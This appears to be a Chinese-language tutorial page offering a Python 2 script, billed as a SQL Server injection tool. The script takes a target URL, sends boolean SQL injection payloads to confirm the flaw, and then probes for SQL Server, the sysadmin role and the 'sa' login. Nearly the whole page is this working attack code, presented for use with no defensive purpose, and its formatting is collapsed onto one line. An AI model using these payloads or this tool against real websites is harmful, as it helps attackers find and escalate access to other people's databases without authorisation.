Python编写检测数据库SA用户的方法

本文讲述一个用python/' target='_blank'>python写的小程序，用于有注入点的链接，以检测当前数据库用户是否为sa，详细代码如下：

# Code by zhaoxiaobu Email: little.bu@hotmail.com  #-*- coding: UTF-8 -*-  from sys import exit  from urllib import urlopen  from string import join,strip  from re import search   def is_sqlable():   sql1="%20and%201=2"   sql2="%20and%201=1"   urlfile1=urlopen(url+sql1)   urlfile2=urlopen(url+sql2)   htmlcodes1=urlfile1.read()   htmlcodes2=urlfile2.read()   if not search(judge,htmlcodes1) and search(judge,htmlcodes2):   print "[信息]恭喜!这个URL是有注入漏洞的!n"   print "[信息]现在判断数据库是否是SQL Server,请耐心等候....."    is_SQLServer()   else:   print "[错误]你确定这个URL能用?换个别的试试吧!n"def is_SQLServer():   sql = "%20and%20exists%20(select%20*%20from%20sysobjects)"   urlfile=urlopen(url+sql)   htmlcodes=urlfile.read()   if not search(judge,htmlcodes):   print "[错误]数据库好像不是SQL Server的!n"   else:   print "[信息]确认是SQL Server数据库!n"   print "[信息]开始检测当前数据库用户权限,请耐心等待......"   is_sysadmin()   def is_sysadmin():    sql = "%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))"   urlfile = urlopen(url+sql)    htmlcodes = urlfile.read()    if not search(judge,htmlcodes):      print "[错误]当前数据库用户不具有sysadmin权限!n"   else:      print "[信息]当前数据库用户具有sysadmin权限!n"     print "[信息]检测当前用户是不是SA,请耐心等待......"     is_sa()   def is_sa():    sql = "%20and%20'sa'=(select%20System_user)";   urlfile = urlopen(url+sql)    htmlcodes = urlfile.read()    if not search(judge,htmlcodes):      print "[错误]当前数据库用户不是SA!n"   else:      print "[信息]当前数据库用户是SA!n"  print "n########################################################################n"  print "            ^o^SQL Server注入利用工具^o^     "  print "           Email: little.bu@hotmail.comn"  print "========================================================================";  url = raw_input('[信息]请输入一个可能有注入漏洞的链接!nURL:')  if url == '':    print "[错误]提供的URL必须具有 '.asp?xxx=' 这样的格式"    exit(1)   judge = raw_input("[信息]请提供一个判断字符串.n判断字符串:")  if judge == '':    print "[错误]判断字符串不能为空!"    exit(1)   is_sqlable()